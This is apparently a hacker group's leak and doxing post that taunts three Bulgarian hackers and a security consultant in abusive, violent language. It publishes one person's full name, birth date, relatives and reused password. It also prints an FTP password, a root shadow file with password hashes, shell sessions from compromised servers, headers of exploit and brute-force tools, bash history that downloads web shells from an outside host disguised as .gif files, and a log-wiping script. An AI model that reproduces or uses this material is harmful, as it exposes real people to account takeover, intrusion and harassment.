1. __________ __ _____ __________.__
  2. \______ \__ _ _______/ |_ / | | \______ \ |__ __ __ ____
  3. | ___/\ \/ \/ / \ __\ / | |_ | ___/ | \| | \/ \
  4. | | \ / | \ | / ^ / | | | Y \ | / | \
  5. |____| \/\_/|___| /__| \____ | |____| |___| /____/|___| /
  6. \/ |__| \/ \/
  7. LOL > SlaserX < LOL
  8. LOL > Pirate-Sky < LOL
  9. LOL > SecurityGuy < LOL
  10. * LOL * SlaserX * LOL *
  11. SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
  12. Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?
  13. Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
  14. [1] http://press.mvr.bg/en/News/news120704_08.htm
  15. >> So, who's this guy?
  16. First Name: Ivan
  17. Last Name: Bachvarov
  18. Nickname: SlaSerX
  19. Birthday: 21.07.1986
  20. Height: 1.76cm
  21. Father: Jecho Bachvarov
  22. Sister: Mariana Bachvarova
  23. Girlfriend: Mihaela Mandalcheva
  24. Location: Burgas, Bulgaria
  25. >> Let's take a look at what his passwords look like.
  26. vbox7.com (slaserx:1986125),
  27. hit.bg (slaserx:1986125),
  28. theunkn0wn.org (slaserx:1986125),
  29. kaldata.com (slaserx:1986125),
  30. bghelp.bg (slaserx:1986125),
  31. etc.
  32. >> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.
  33. >> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
  34. root@bgdns:/root# uname -a
  35. Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
  36. root@bgdns:/root# w
  37. 23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
  38. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  39. root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
  40. root pts/1 office 17:37 5:17m 0.34s 0.34s -bash
  41. root@bgdns:/root# cat /etc/shadow
  42. root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
  43. daemon:*:15024:0:99999:7:::
  44. bin:*:15024:0:99999:7:::
  45. sys:*:15024:0:99999:7:::
  46. sync:*:15024:0:99999:7:::
  47. games:*:15024:0:99999:7:::
  48. man:*:15024:0:99999:7:::
  49. lp:*:15024:0:99999:7:::
  50. mail:*:15024:0:99999:7:::
  51. news:*:15024:0:99999:7:::
  52. uucp:*:15024:0:99999:7:::
  53. proxy:*:15024:0:99999:7:::
  54. www-data:*:15024:0:99999:7:::
  55. backup:*:15024:0:99999:7:::
  56. list:*:15024:0:99999:7:::
  57. irc:*:15024:0:99999:7:::
  58. gnats:*:15024:0:99999:7:::
  59. nobody:*:15024:0:99999:7:::
  60. libuuid:!:15024:0:99999:7:::
  61. Debian-exim:!:15024:0:99999:7:::
  62. statd:*:15024:0:99999:7:::
  63. sshd:*:15024:0:99999:7:::
  64. slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
  65. postfix:*:15024:0:99999:7:::
  66. mysql:!:15024:0:99999:7:::
  67. bind:*:15024:0:99999:7:::
  68. polw:!:15024:0:99999:7:::
  69. postgrey:*:15024:0:99999:7:::
  70. proftpd:!:15024:0:99999:7:::
  71. ftp:*:15024:0:99999:7:::
  72. vmail:!:15024:0:99999:7:::
  73. vu2000:!:15024:0:99999:7:::
  74. vu2001:!:15024:0:99999:7:::
  75. vu2002:!:15024:0:99999:7:::
  76. vu2003:!:15024:0:99999:7:::
  77. snmp:*:15025:0:99999:7:::
  78. vu2004:!:15025:0:99999:7:::
  79. vu2005:!:15031:0:99999:7:::
  80. vu2006:!:15034:0:99999:7:::
  81. vu2007:!:15034:0:99999:7:::
  82. vu2008:!:15035:0:99999:7:::
  83. messagebus:*:15038:0:99999:7:::
  84. lbcd:*:15038:0:99999:7:::
  85. vu2009:!:15039:0:99999:7:::
  86. >> Ever wondered what the most powerful hacker tools look like? Well, take look..
  87. root@bgdns:/root# head -25 l33t/a.pl
  88. #!/usr/bin/perl
  89. use IO::Socket;
  90. print q{
  91. #######################################################################
  92. # vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
  93. # By indoushka #
  94. # www.iq-ty.com/vb #
  95. # Souk Naamane (00213771818860) #
  96. # Algeria Hackerz ([email protected]) #
  97. # Dork: Powered by vBulletin. Version 4.0.1 #
  98. #######################################################################
  99. };
  100. if (!$ARGV[2]) {
  101. print q{
  102. Usage: perl VB4.0.1.pl host /directory/ victim_userid
  103. perl VB4.0.1.pl www.vb.com /forum/ 1
  104. };
  105. root@bgdns:/root# head -5 l33t/gen
  106. #!/usr/bin/perl
  107. ##
  108. ### bren.pl . Generate every character combination for 15 characters in length(ughh.)
  109. ##
  110. #
  111. root@bgdns:/root# head -30 l33t/t.pl
  112. #!/usr/bin/perl
  113. use IO::Socket;
  114. use LWP::Simple;
  115. use MIME::Base64;
  116. $host = $ARGV[0];
  117. $user = $ARGV[1];
  118. $port = $ARGV[2];
  119. $list = $ARGV[3];
  120. $file = $ARGV[4];
  121. $url = "http://".$host.":".$port;
  122. if(@ARGV < 3){
  123. print q(
  124. ###############################################################
  125. # Cpanel Password Brute Force Tool #
  126. ###############################################################
  127. # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
  128. #-------------------------------------------------------------#
  129. # [Host] : victim Host (simorgh-ev.com) #
  130. # [User] : User Name (demo) #
  131. # [PORT] : Port of Cpanel (2082) #
  132. #[list] : File Of password list (list.txt) #
  133. # [File] : file for save password (password.txt) #
  134. # #
  135. ###############################################################
  136. # (c)oded By Hessam-x / simorgh-ev.com #
  137. ###############################################################
  138. );exit;}
  139. root@bgdns:/root# tar tvf tools.tar
  140. drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
  141. -rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
  142. -rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
  143. -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
  144. -rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
  145. drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
  146. -rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
  147. -rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
  148. -rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
  149. -rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
  150. -rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
  151. -rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
  152. -rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
  153. -rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
  154. -rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
  155. -rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
  156. -rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
  157. -rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
  158. -rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
  159. -rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
  160. -rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
  161. -rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
  162. -rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
  163. -rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
  164. drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
  165. -rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
  166. -rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
  167. -rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
  168. -rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
  169. -rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
  170. -rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
  171. -rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
  172. -rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
  173. drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
  174. -rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
  175. -rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
  176. -rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
  177. -rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc
  178. root@bgdns:/root# tar tzvf t.tar.gz
  179. drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
  180. -rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
  181. -rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
  182. -rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
  183. -rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
  184. -rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
  185. -rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
  186. -rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
  187. -rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
  188. -rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen
  189. root@bgdns:/root# cat .bash_alias
  190. # some more ls aliases
  191. alias less='less -SR'
  192. alias l='ls -lLBhX --time-style=locale'
  193. alias la='ls -la $1 | less'
  194. alias ll='ls -lX'
  195. alias lx='ls -lXB' #sort by ext
  196. alias lk='ls -lSr' #soft by size
  197. # Alias's to modifed commands
  198. alias ps='ps auxf'
  199. alias home='cd ~'
  200. alias pg='ps aux | grep' #requires an argument
  201. alias lg='ls -la | grep' #requires an argument
  202. alias un='tar -zxvf'
  203. alias df='df -hT'
  204. alias ping='ping -c 10'
  205. #alias net-restart='sudo /etc/init.d/networking restart'
  206. #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
  207. alias ..='cd ..'
  208. alias update='sudo apt-get update'
  209. alias upgrade='sudo apt-get upgrade'
  210. alias install='sudo apt-get install'
  211. alias remove='sudo apt-get remove'
  212. #alias eclipse='eclipse -vmargs -Xmx512M'
  213. #alias firefox='firefox-3.5'
  214. alias ipconfig='ifconfig -a'
  215. #My alias
  216. alias flood='netstat'
  217. alias stop='/root/tools/stop.flood'
  218. alias ban='/root/tools/ban.pl'
  219. alias unban='/root/tools/unban.pl'
  220. alias monitor='/root/tools/monitor.sh'
  221. alias cron='env EDITOR=nano crontab -e'
  222. alias editcfg='pico /var/www/ispcp/gui/index.php'
  223. alias arest='/etc/init.d/apache2 restart'
  224. alias cls='clear'
  225. alias q='exit'
  226. # Some ssh connections
  227. alias shell='ssh -l slaserx slaserx.ath.cx'
  228. #alias xalo='sudo vpnc-connect xalo.conf'
  229. # Some ping commands
  230. #alias pga='ping 192.168.1.1 -c 10'
  231. #alias pgo='ping google.com -c 10'
  232. #alias phk='ping hkvn.info -c 10'
  233. #alias pch='ping chuyenhungyen.org -c 10'
  234. #Some chmod commands
  235. alias mx='chmod a+x'
  236. alias 000='chmod 000'
  237. alias 644='chmod 644'
  238. alias 755='chmod 755'
  239. # cat .bash_history
  240. clear
  241. nmap localhost
  242. exit
  243. host perfektno.com
  244. w
  245. iptables -L |grep 77.78.36.40
  246. ban 77.78.36.40
  247. pico /etc/init.d/firewall
  248. ls -a
  249. iptables -L
  250. clear
  251. search metaspolit
  252. search metasploit
  253. search icmp rate
  254. pico /etc/init.d/firewall
  255. iptables -L
  256. stop
  257. flood
  258. clear
  259. exit
  260. pico /etc/networks
  261. pico /etc/network/interfaces
  262. exit
  263. host cs-adrenalines.info
  264. host 79.124.67.194
  265. stop
  266. flood
  267. cat /var/log/fail2ban.log
  268. cat /var/log/psad/fw_check
  269. cat /var/log/psad/top_attackers
  270. clear
  271. clear
  272. stop
  273. exit
  274. cd l33t/
  275. wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  276. ls -a
  277. wget
  278. wget --help
  279. wget --help |grep ssl
  280. wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  281. tar -jxvf nikto-2.1.4.tar.bz2
  282. cd nikto-2.1.4/
  283. ls -a
  284. ./nikto.pl
  285. ./nikto.pl -host abv.bg -root
  286. ./nikto.pl -host abv.bg -root+
  287. ./nikto.pl -host abv.bg
  288. ./nikto.pl
  289. ./nikto.pl -host
  290. ./nikto.pl -host pweb.co.cc
  291. w
  292. last
  293. flood
  294. stop
  295. apachectl restart
  296. stop
  297. apachectl restart
  298. cd /root/tools/
  299. ./dellog
  300. cat /var/log/apache2/pirate-sky.info-combined.log
  301. cat /var/log/apache2/pirate-sky.info-combined.log
  302. cat /var/log/apache2/pirate-sky.info-combined.log
  303. iptables -L
  304. host eco.gov.kz
  305. cat /var/log/apache2/pirate-sky.info-combined.log
  306. apachectl restart
  307. apachectl restart
  308. ls -a
  309. cron
  310. cron
  311. /etc/init.d/cron restart
  312. cd /var/www/virtual/warez-database.org/htdocs/
  313. ls -a
  314. cd hooks/
  315. ls -a
  316. cd ..
  317. ls -a
  318. cd converge_local/
  319. ls -a
  320. ls -a
  321. ls -a
  322. wget xpls.hit.bg/shell/shell.gif
  323. rm -rf shell.gif
  324. wget xpls.hit.bg/shell/linuxbg.shell
  325. wget xpls.hit.bg/shell/linuxbg.gif
  326. rm -rf linuxbg.*
  327. ls -a
  328. ls -a
  329. mv /home/slaserx/faq.php ./
  330. ls -a
  331. rm -rf .htaccess
  332. ls -a
  333. rm -rf faq.php
  334. /
  335. cd /
  336. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  337. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  338. clear
  339. whois privatecrew.net
  340. whois privatecrew.net
  341. whois bgdns.info
  342. host freebsd.bg
  343. clear
  344. genpasswd
  345. clear
  346. genpasswd
  347. genpasswd
  348. genpasswd
  349. ls -a
  350. cd /var/www/virtual/privatecrew.net/htdocs/
  351. ls -s
  352. ls -a
  353. rm -rf *
  354. ls -a
  355. ls -a
  356. cd ..
  357. cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  358. ls -a
  359. cat ../pirate-sky.info/htdocs/conf_global.php
  360. ls -a
  361. cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
  362. clear
  363. ls -a
  364. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  365. rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  366. genpasswd
  367. genpasswd
  368. genpasswd
  369. ls -a
  370. cd htdocs/
  371. ls -a
  372. pico /etc/init.d/firewall
  373. cat /etc/init.d/firewall
  374. iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
  375. pico /etc/init.d/firewall
  376. /etc/init.d/firewall
  377. flood
  378. stop
  379. ls -a
  380. iptables -L |grep 94.156.142.66
  381. iptables -L |grep lucifer
  382. stop
  383. iptables -L |grep 95.42.32.36
  384. iptables -L
  385. cd /var/www/fcgi/
  386. ls -a
  387. pico warez-database.org/php5/php.ini
  388. pico privatecrew.net/php5/php.ini
  389. pico privatecrew.net/php5/php.ini
  390. apachectl restart
  391. pico privatecrew.net/php5/php.ini
  392. apachectl restart
  393. ls -a
  394. pico pirate-sky.com/php5/php.ini
  395. pico privatecrew.net/php5/php.ini
  396. apachectl restart
  397. cd /root/tools/
  398. ls -a
  399. cd shells/
  400. pico new.p
  401. pico new
  402. ls -a
  403. ./a
  404. ls -a
  405. pico find.r57
  406. pico new
  407. ./find.
  408. ./new
  409. ls -a
  410. ls -a
  411. cd /var/www/virtual/
  412. ls -a
  413. cd privatecrew.net/htdocs/
  414. cd /root/tools/
  415. cd shells/
  416. ./new
  417. ls -a
  418. pico new
  419. pico find.eval
  420. ls -a
  421. pico new
  422. pico new
  423. ./new
  424. ls -a
  425. pico new
  426. ls -a
  427. ./new
  428. ls -a
  429. pico new
  430. ls -a
  431. ./new
  432. pico new
  433. ./new
  434. ls -a
  435. rm -rf new
  436. pico find.shell
  437. cat scan.txt
  438. pico scan.txt
  439. rm -rf scan.txt
  440. ls -a
  441. ./find.shell
  442. ls -a
  443. cat scan.txt
  444. ls -a
  445. rm -rf scan.txt
  446. cat sc
  447. ls -a
  448. pico find.shell
  449. pico find.shell
  450. ./find.shell
  451. cat scan.txt
  452. rm -rf scan.txt
  453. ls -a
  454. ./find.shell
  455. cat scan.txt
  456. cat scan.txt |grep faq.php
  457. ls -a
  458. rm -rf scan.txt
  459. pico /var/www/virtual/privatecrew.net/htdocs/faq.php
  460. pico find.shell
  461. ls -a
  462. ./find.
  463. ./find.shell
  464. cat scan.txt
  465. ls -a
  466. clear
  467. cd /var/www/virtual/
  468. ls -a
  469. cd privatecrew.net/
  470. ls -a
  471. cd htdocs/
  472. cd 0893552070/
  473. ls -a
  474. wget http://xpls.hit.bg/shell/c99.gif
  475. wget http://xpls.hit.bg/shell/devil.gif
  476. wget http://xpls.hit.bg/shell/linux.gif
  477. ls -a
  478. mv linux.gif linux.php
  479. ls -a
  480. mv devil.gif devil.php
  481. mv c99.gif c99.php
  482. ls -a
  483. wget http://xpls.hit.bg/shell/shell.gif
  484. mv shell.gif shell.php
  485. ls -a
  486. ls -a
  487. ls -a
  488. ls -a
  489. ls -a
  490. ls -a
  491. ls -a
  492. cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
  493. rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
  494. ls -a
  495. ls -a
  496. ls -a
  497. clear
  498. ls -a
  499. cd ..
  500. rm -rf 0893552070/
  501. ls -a
  502. exit
  503. ls -a
  504. ls -a
  505. cd /var/www/virtual/pirate-sky.
  506. cd /var/www/virtual/privatecrew.net/htdocs/
  507. ls -a
  508. cd a
  509. ls -a
  510. cd asd/
  511. ls -a
  512. ls -a
  513. ls -a
  514. ls -a
  515. ls -a
  516. ls -a
  517. ls -a
  518. ls -a
  519. ls -a
  520. ls -a
  521. ls -a
  522. ls -a
  523. ls -a
  524. ls -a
  525. ls -a
  526. ls -a
  527. ls -a
  528. rm crontab -l
  529. crontab -l
  530. ls -a
  531. ls -a
  532. ls -a
  533. ls -a
  534. ls -a
  535. ls -a
  536. ls -a
  537. cd ..
  538. ls -a
  539. ls -a
  540. rm -rf admin/
  541. rm -rf cache/
  542. rm -rf con*
  543. ls -a
  544. rm -rf includes/
  545. ls -a
  546. ls -a
  547. rm -rf interface/
  548. rm -rf ips_kernel/
  549. ls -a
  550. rm -rf public/
  551. rm -rf starforum/
  552. ls -a
  553. rm -rf uploads/
  554. ls -a
  555. ls -a
  556. ls -a
  557. cd ..
  558. cd htdocs/
  559. cd ..
  560. cd backups/
  561. ls -a
  562. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  563. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  564. ls -a
  565. pico /etc/crontab
  566. ls -a
  567. cd ..
  568. ls -a
  569. cd htdocs/
  570. ls -a
  571. cd ..
  572. cd backups/
  573. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  574. cd ..
  575. cd htdocs/
  576. cd pp/
  577. ls -a
  578. ls -a
  579. ls -a
  580. ls -a
  581. ls -a
  582. ls -a
  583. host mikrotik-bg.net
  584. host 195.191.149.89
  585. cat /var/log/cron.log
  586. ls -a
  587. crontab -l
  588. cron
  589. /etc/init.d/cron restart
  590. /etc/init.d/cron status
  591. ls -a
  592. ls -a
  593. cat /var/log/cron.log
  594. cat /var/log/cron.log |grep err
  595. clear
  596. ls -a
  597. ls -a
  598. ls -a
  599. ls -a
  600. ls -a
  601. ls -a
  602. ls -a
  603. ls -a
  604. ls -a
  605. ls -a
  606. ls -a
  607. ls -a
  608. cat /var/log/cron.log
  609. ls -a
  610. ls -a
  611. crontab -l
  612. ls -a
  613. ls -a
  614. cat /var/log/cron.log
  615. ls -a
  616. ls -a
  617. ls -a
  618. ls -a
  619. ls -a
  620. ls -a
  621. ls -a
  622. ls -a
  623. ls -a
  624. ls -a
  625. ls -a
  626. ls
  627. ls
  628. ls -a
  629. ls -a
  630. ls -a
  631. ls -a
  632. ls -a
  633. ls -la
  634. ls -a
  635. ls -a
  636. ls -a
  637. ls -a
  638. ls -a
  639. cat /var/log/cron.log
  640. ls -a
  641. ls -a
  642. ls -a
  643. ls -a
  644. ls -a
  645. ls -a
  646. wget xpls.hit.bg/shell.gif
  647. wget xpls.hit.bg/linux.gif
  648. mv linux.gif linux.php
  649. mv shell.gif shell.php
  650. ls -a
  651. ls -a
  652. ls -a
  653. ls -a
  654. ls -a
  655. ls -a
  656. ls -a
  657. ls -a
  658. rm -rf /tmp/scan.txt
  659. ls -a
  660. ls -a
  661. ls -la
  662. ls -a
  663. ls -a
  664. ls -a
  665. pico linux.php
  666. ls -a
  667. rm -rf linux.php
  668. rm -rf shell.php
  669. ls -a
  670. ls -a
  671. wget xpls.hit.bg/shell/shell.gif
  672. wget xpls.hit.bg/shell/linux.gif
  673. mv linux.gif linux.php
  674. mv shell.gif shell.php
  675. pico shell.php
  676. ls -a
  677. pico shell.php
  678. ls -a
  679. wget xpls.hit.bg/shell/shell.gif
  680. mv linux.gif linux.php
  681. wget xpls.hit.bg/shell/linux.gif
  682. ls -a
  683. mv linux.gif linux.php
  684. mv shell.gif shell.php
  685. ls -a
  686. ls -a
  687. ls -a
  688. ls -a
  689. ls -a
  690. cat /tmp/scan.txt
  691. ls -a
  692. ls -a
  693. ls -a
  694. ls -a
  695. cat /var/log/cron.log
  696. ls -a
  697. ls -a
  698. ls -a
  699. ls -a
  700. ls -a
  701. ls -a
  702. ls -a
  703. ls -a
  704. ls -a
  705. cd ..
  706. cd ..
  707. cd ..
  708. cd ..
  709. exit
  710. cd /var/www/virtual/
  711. ls -a
  712. cd linuxbg.info/
  713. cd backups/
  714. ls -a
  715. rm -rf t3es_vb.sql.bz2
  716. ls -a
  717. rm -rf t3es_soze.sql.bz2
  718. ls -a
  719. whois cms-bg.com
  720. whois jump.bg
  721. stop
  722. cat /tmp/scan.txt
  723. cat /var/log/apache2/other_vhosts_access.log
  724. cat /var/log/apache2/default-error.log
  725. clear
  726. cat /var/log/apache2/default-error.log
  727. clear
  728. cat /var/log/apache2/default-error.log
  729. cat /var/log/apache2/default-error.log
  730. cat /var/log/apache2/default-error.log
  731. clear
  732. clear
  733. clear
  734. exit
  735. os -a
  736. pico /etc/init.d/firewall
  737. ping abv.bg
  738. ls -a
  739. exit
  740. root@bgdns:/root/tools/backup# cat backup-psc
  741. #!/bin/sh
  742. #Created by SlaSerX
  743. #red='1;31m'
  744. TARGET_EMAIL="[email protected]"
  745. # local directory to pickup *.tar.gz file
  746. tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
  747. # ftp remote connections
  748. FTPU="backup" # ftp login name
  749. FTPP="1986125" # ftp password
  750. FTPS="85.217.204.199" # remote ftp server
  751. FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
  752. LOCALD="/backup/psc/*.tgz"
  753. ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD
  754. echo
  755. echo -e " \e[${red} Upload psc Backup \e[m"
  756. echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
  757. echo
  758. root@bgdns:/root/tools# head -10 check.ssh
  759. #!/usr/bin/perl
  760. ##############################################################################
  761. # By BumbleBeeWare.com 2006
  762. # SSH Log Checker
  763. # sshlogcheck.cgi
  764. # reads ssh log and blocks hacking attempts using ip tables
  765. ##############################################################################
  766. # CONFIGURE
  767. ##############################################################################
  768. root@bgdns:/root/tools# cat dellog
  769. #!/bin/bash
  770. #Created by SlaSerX
  771. red='1;31m'
  772. /bin/rm -rf /var/log/apache2/*.log
  773. /bin/rm -rf /var/log/apache2/*.log.*
  774. /bin/rm -rf /var/log/apache2/users/*.log
  775. /bin/rm -rf /var/log/apache2/users/*.log.*
  776. /etc/init.d/apache2 restart
  777. echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
  778. root@bgdns:/root/tools# cat grep.404
  779. grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' '[email protected]'
  780. >> Refer to the URL at the end of the file for some more fun.
  781. * LOL * Pirate-Sky * LOL *
  782. Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
  783. You can clearly see how randomly they choose their targets -
  784. http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
  785. >> Check the aforementioned URL for their databases. ;)
  786. * LOL * SecurityGuy * LOL *
  787. Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
  788. >> Let's just briefly review what's this bitch up to.
  789. [email protected] [/home/nopasara/public_html/securityguy]# uname -a
  790. Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
  791. [email protected] [/home/nopasara/public_html/securityguy]# id
  792. uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
  793. [email protected] [/home/nopasara]# ls -lia
  794. total 28108
  795. 35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
  796. 2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
  797. 35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
  798. 35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
  799. 35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
  800. 35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
  801. 35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
  802. 35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
  803. 35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
  804. 35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
  805. 35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
  806. 35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
  807. 35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
  808. 35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
  809. 35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
  810. 35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
  811. 35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
  812. 35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
  813. 35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
  814. 36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
  815. 35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
  816. 35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
  817. 36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
  818. 35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
  819. 35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
  820. 35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
  821. 35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
  822. 35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
  823. 35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
  824. 35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
